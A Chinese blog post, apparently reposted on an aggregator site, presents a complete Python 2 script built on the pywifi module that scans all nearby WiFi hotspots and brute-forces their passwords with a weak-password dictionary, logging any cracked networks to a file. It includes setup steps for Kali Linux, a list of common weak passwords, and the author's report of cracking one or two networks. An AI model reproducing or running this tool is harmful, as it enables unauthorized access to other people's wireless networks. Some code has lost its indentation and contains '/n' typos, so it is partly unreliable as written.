一个非常简单易懂的WIFI密码爆破python脚本

2017-01-09 14:10:58来源:oschina作者:Apathy人点击

第七城市


### **环境准备**
-python2.7
- 凑合的linux
- 差不多的无线网卡
-[pywifi模块](https://github.com/awkman/pywifi/archive/master.zip)
- 弱口令字典
首先,这个模块在win下有点糟糕,所以推荐在linux下跑,我测试所使用的是Kali 2.0自带python 2.7.6 ,可直接通过 pip install pywifi 安装。
### **导入模块**
这里用的模块就这三个 pywifi的_wifiutil_linux.py脚本的 _send_cmd_to_wpas方法中的if reply != b'OK/n':判断需要修改,不然会有很多的提示信息。
```
from pywifi import *
import time
import sys
```
### **字典准备**
效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的wifi弱口令TOP101. 12345678
1. 123456789
1. 88888888
1. 1234567890
1. 00000000
1. 87654321
1. 66668888
1. 11223344
1. 147258369
1. 11111111
### **配置扫描器**
推荐扫描时常可以设置在15-20秒之间 测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义 到时候就算破解成功的热点,信号也好不到哪里
```
def main():
#扫描时常
scantimes = 3
#单个密码测试延迟
testtimes = 15
output = sys.stdout
#结果文件保存路径
files = "TestRes.txt"
#字典列表
keys = open(sys.argv[1],"r").readlines()
print "|KEYS %s"%(len(keys))
#实例化一个pywifi对象
wifi = PyWiFi()
#选择定一个网卡并赋值于iface
iface = wifi.interfaces()[0]
#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置
scanres = scans(iface,scantimes)
#统计附近被发现的热点数量
nums = len(scanres)
print "|SCAN GET %s"%(nums)
print "%s/n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s /n%s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70)
#将每一个热点信息逐一进行测试
for i,x in enumerate(scanres):
#测试完毕后,成功的结果讲存储到files中
res = test(nums-i,iface,x,keys,output,testtimes)
if res:
open(files,"a").write(res)
```
### **扫描周围热点**
```
def scans(face,timeout):
#开始扫描
face.scan()
time.sleep(timeout)
#在若干秒后获取扫描结果
return face.scan_results()
```
### **热点测试**
这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。
```
def test(i,face,x,key,stu,ts):
#显示对应网络名称,考虑到部分中文名啧显示bssid
showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid
#迭代字典并进行爆破
for n,k in enumerate(key):
x.key = k.strip()
#移除所有热点配置
face.remove_all_network_profiles()
#讲封装好的目标尝试连接
face.connect(face.add_network_profile(x))
#初始化状态码,考虑到用0会发生些逻辑错误
code = 10
t1 = time.time()
#循环刷新状态,如果置为0则密码错误,如超时则进行下一个
while code!=0 :
time.sleep(0.5)
code = face.status()
now = time.time()-t1
if now>ts:
break
stu.write("/r%-*s| %-*s| %s |%*.2fs| %-*s |%-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace("/n","")))
stu.flush()
if code == 4:
face.disconnect()
return "%-*s| %s | %*s |%*s/n"%(20,x.ssid,x.bssid,3,x.signal,15,k)
return False
```
### **案例**
这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了
- _**WIFIID**_ 热点的id号 每跑一个会减1
- _**SSID OR BSSID**_ 热点的ssid名或mac地址
- _**N**_ 对热点的连接状态,这个在
- **_time_** 当前所花去的时间
- **_signal_** 热点的信号强度,若小越好
- **_KEYNUM_** 测试密码的id 每跑一个会减1
- **_KEY_** 当前测试的密码
![输入图片说明](/2014th7cj/d/file/p/20170109/4bhytyepb3d.png "在这里输入图片标题")
结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 - -
第七城市

最新文章

123

最新摄影

微信扫一扫

第七城市微信公众平台